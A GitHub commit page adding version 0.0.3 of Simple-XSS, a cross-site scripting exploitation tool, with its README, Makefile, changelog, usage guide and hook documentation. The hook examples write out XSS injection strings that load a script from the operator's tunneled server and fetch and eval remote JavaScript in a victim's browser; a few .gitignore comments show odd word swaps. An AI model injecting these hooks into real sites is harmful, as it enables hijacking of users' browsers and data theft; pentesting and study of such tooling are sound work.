Skip to content

Commit

Permalink
Add: V0.0.3
Browse files Browse the repository at this point in the history
  • Loading branch information
@CrazyProger1
CrazyProger1 committed Apr 1, 2024
2 parents 054c8a2 + b8dccd3 commit ec1e747
Show file tree
Hide file tree
Showing 336 changed files with 5,840 additions and 4 deletions.
15 changes: 11 additions & 4 deletions .gitignore
View file
Original file line number Diff line number Diff line change
Expand Up @@ -36,7 +36,7 @@ MANIFEST
pip-log.txt
pip-delete-this-directory.txt

# Unit test / coverage reports
# Unit http / coverage reports
htmlcov/
.tox/
.nox/
Expand All @@ -57,7 +57,6 @@ cover/

# Django stuff:
*.log
local_settings.py
db.sqlite3
db.sqlite3-journal

Expand All @@ -83,7 +82,7 @@ profile_default/
ipython_config.py

# pyenv
# For a library or package, you might want to ignore these files since the code is
# For a library or package, you might want to ignore these files since the js is
# intended to run in multiple environments; otherwise, check them in:
# .python-version

Expand All @@ -99,7 +98,7 @@ ipython_config.py
# This is especially recommended for binary packages to ensure reproducibility, and is more
# commonly ignored for libraries.
# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control
#poetry.lock
poetry.lock

# pdm
# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control.
Expand Down Expand Up @@ -159,3 +158,11 @@ cython_debug/
# option (not recommended) you can uncomment the following to ignore the entire idea folder.
.idea/

# Linter
.ruff_cache


# settings
settings.toml
Simple-XSS.log

18 changes: 18 additions & 0 deletions Makefile
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
.PHONY: test
test:
poetry run python -m pytest tests/


.PHONY: run
run:
poetry run python -m simplexss


.PHONY: translations
translations:
poetry run python -m i18n simplexss/__init__.py simplexss.pot


.PHONY: build
build:
poetry run pyinstaller -F --name Simple-XSS --icon "resources/images/logo.ico" simplexss/__main__.py
81 changes: 81 additions & 0 deletions README.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,81 @@
# Simple-XSS

<p align="center">
<img src="resources/images/logo.png" alt="Simple-XSS logo"/>
</p>

<p align="center">
<a href="https://github.com/CrazyProger1/Simple-XSS/releases/download/V0.2/Simple-XSS-Windows-x64.zip"><img alt="GitHub all releases" src="https://img.shields.io/github/downloads/CrazyProger1/Simple-XSS/total"></a>
<a href="https://github.com/CrazyProger1/Simple-XSS/blob/master/LICENSE"><img alt="GitHub" src="https://img.shields.io/github/license/CrazyProger1/Simple-XSS"></a>
<a href="https://github.com/CrazyProger1/Simple-XSS/releases/latest"><img alt="GitHub release (latest by date)" src="https://img.shields.io/github/v/release/CrazyProger1/Simple-XSS"></a>
</p>

Simple-XSS is a multi-platform cross-site scripting (XSS) vulnerability exploitation tool for pentesting.

Problems solved by Simple-XSS:

- [x] Easy creatable payloads & hooks
- [x] Support of several transport services (HTTP, Websocket)
- [x] Support of several tunneling services (to deliver payload even without white IP)

**Disclaimer:** This program is provided for educational and research purposes only.
The creator of this program does not condone or support any illegal or malicious activity,
and will not be held responsible for any such actions taken by others who may use this program.
By downloading or using this program, you acknowledge that you are solely responsible for any consequences
that may result from the use of this program.

## Documentation

See **[docs](./docs/README.md)**

## Status

**V0.3 - indev(working on docs & refactorings)**

## Interface

### Graphical

![v0.0.3](resources/images/v0.0.3.png)

## Warning

In favor of ease of use and expanded capabilities, we had to sacrifice backward compatibility between versions 0.2 and
0.0.3. The features of the previous version are retained and expanded, but older versions of hook & payload will not
work.

## Installation

**Note:** _make sure you have installed [Python 3.12](https://www.python.org/) or higher._

First you need to clone the repository:

```commandline
git clone https://github.com/CrazyProger1/Simple-XSS
```

Then go to the folder & install the requirements:

**For Window:**

```commandline
cd Simple-XSS
pip install -r requirements/windows.txt
```

**For Linux:**

```commandline
cd Simple-XSS
pip install -r requirements/linux.txt
```

And finally you can launch it:

```commandline
python simplexss
```

## License

Simple-XSS is released under the MIT License. See the bundled [LICENSE](LICENSE) file for details.
172 changes: 172 additions & 0 deletions Simple-XSS.log
View file

Large diffs are not rendered by default.

17 changes: 17 additions & 0 deletions docs/CHANGELOG.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
# Simple-XSS Changelog

## V0.0.3

- [x] Rewritten from scratch to improve maintainability and expand functionality

- [x] Added support for various protocols (as transport services)
- [x] HTTP
- [ ] Websockets (unfinished)

- [x] Added tunneling service
- [x] Serveo
- [x] Ngrok

- [x] Added plugin system

- [x] Added i18n
43 changes: 43 additions & 0 deletions docs/GUIDE.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,43 @@
# Simple-XSS Guide

- Choose transport option:

![](../resources/images/tutor1.png)

- Enter a convenient host and port on which the transport server should run:

![](../resources/images/tutor2.png)

- Choose tunneling option (if you have a white IP or want to test locally - turn off "Use Tunneling Service"):

![](../resources/images/tutor3.png)

![](../resources/images/tutor4.png)

- Choose hook option:

![](../resources/images/tutor5.png)

- Choose payload option:

![](../resources/images/tutor6.png)

- Run the process:

![](../resources/images/tutor7.png)

- You'll see hook, copy it:

![](../resources/images/tutor8.png)

- Test your hook:

![](../resources/images/tutor9.png)

- Client hooked, now you can enter and send text:
![](../resources/images/tutor10.png)

![](../resources/images/tutor11.png)

- See alert:
![](../resources/images/tutor12.png)
53 changes: 53 additions & 0 deletions docs/HOOKS.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,53 @@
# Simple-XSS Hooks

See [hook.](VOCABULARY.md)

See [environment](PAYLOADS.md/#environment) - same as payload.

See [io](PAYLOADS.md/#io-api) - same as payload.

## Examples

### HTTP Default Hook

```python
# hook.py

from simplexss.api.hooks import BaseHook


class Hook(BaseHook):
AUTHOR = 'crazyproger1'
DESCRIPTION = 'Default HTTP hook, uses script src.'
NAME = 'Default HTTP Hook'
VERSION = '0.0.1'
TRANSPORTS = (
'Default HTTP Transport',
)

@property
def hook(self) -> str:
return f'<script src="{self.environment.url}/.js"></script>'
```

### HTTP Eval Hook

```python
# hook.py

from simplexss.api.hooks import BaseHook


class Hook(BaseHook):
AUTHOR = 'crazyproger1'
DESCRIPTION = 'HTTP Eval hook. '
NAME = 'HTTP Eval Hook'
VERSION = '0.0.1'
TRANSPORTS = (
'Default HTTP Transport',
)

@property
def hook(self) -> str:
return f'<script>fetch("{self.environment.url}/.js").then(r => r.text().then(t => eval(t)))</script>'
```
Loading

0 comments on commit ec1e747

Please sign in to comment.